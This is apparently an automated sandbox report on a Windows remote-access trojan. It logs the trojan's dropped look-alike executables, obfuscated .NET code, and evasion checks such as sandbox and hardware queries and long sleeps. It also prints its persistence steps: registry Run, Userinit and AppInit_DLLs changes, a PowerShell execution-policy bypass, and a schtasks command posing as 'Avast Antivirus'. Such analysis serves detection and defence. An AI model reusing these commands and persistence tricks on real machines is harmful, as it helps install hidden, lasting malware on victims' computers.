Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: netfxperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: bitsperf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: bitsproxy.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: esentprf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfts.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: utildll.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msdtcuiu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msdtcprx.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: mtxclu.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: clusapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: resutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: msscntrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfdisk.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: wmiclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfnet.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: browcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfos.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: perfproc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: sysmain.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: rasctrs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeSection loaded: tapiperf.dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: ptKNiAaGus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ptKNiAaGus.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\Sheet rat v 2.2\Src\Plugins\SendFile\obj\Release\SendFile.pdb source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: ptKNiAaGus.exe, WSBzhPoDCyO.cs .Net Code: DkrItwdZ
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs .Net Code: Read System.Reflection.Assembly.Load(byte[])
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs .Net Code: Read
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, gEjezvihrA.cs .Net Code: oRziWoOpFzwVe
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, gEjezvihrA.cs .Net Code: oRziWoOpFzwVe
Source: xdwdPutty.exe.33.dr, gEjezvihrA.cs .Net Code: oRziWoOpFzwVe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: ptKNiAaGus.exe Static PE information: 0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]
Source: xdwdPutty.exe.33.dr, WfcSxBiJWHQqTp.csHigh entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: xdwdPutty.exe.33.dr, LtuDkZEKFIyjL.csHigh entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: xdwdPutty.exe.33.dr, uBecUVPQ.csHigh entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: xdwdPutty.exe.33.dr, rTbUtmWcnO.csHigh entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: xdwdPutty.exe.33.dr, kICtJPxSafoGvi.csHigh entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: xdwdPutty.exe.33.dr, bNrRgbuKfhLKh.csHigh entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: xdwdPutty.exe.33.dr, KPKTbmek.csHigh entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe; File created: C:\Users\user\Videos\xdwdPutty.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; File created: C:\Users\user\xdwdPutty.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe; File created: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe

Boot Survival

Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Registry value created: RequireSignedAppInit_DLLs 0
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadAppInit_DLLs
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; File created: C:\Users\user\xdwdPutty.exe
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Key value created or modified: HKEY_CURRENT_USER\SOFTWARE D396F3C20883A3B71244C87C537595108010239E4E17E6C09BCA83EA5A475677
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ptKNiAaGus.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.0000000003151000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002531000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMemory allocated: 1200000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMemory allocated: 1ACA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 31A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1B3E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeMemory allocated: F60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeMemory allocated: 1AF10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeMemory allocated: 3050000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeMemory allocated: 1B150000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 2750000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 1A7E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1AFB0000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 2BF0000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 1ADB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 24E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 2290000 memory reserve | memory write watch
Source: C:\Users\user\xdwdPutty.exeMemory allocated: 1A530000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 600000
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599875
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599766
Source: C:\Users\user\Desktop\ptKNiAaGus.exeThread delayed: delay time: 599641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeThread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\xdwdPutty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWindow / User API: threadDelayed 9915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9894
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWindow / User API: threadDelayed 9954
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9923
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeDropped PE file which has not been started: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\ptKNiAaGus.exe TID: 9444Thread sleep time: -599641s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9836Thread sleep count: 9894 > 30
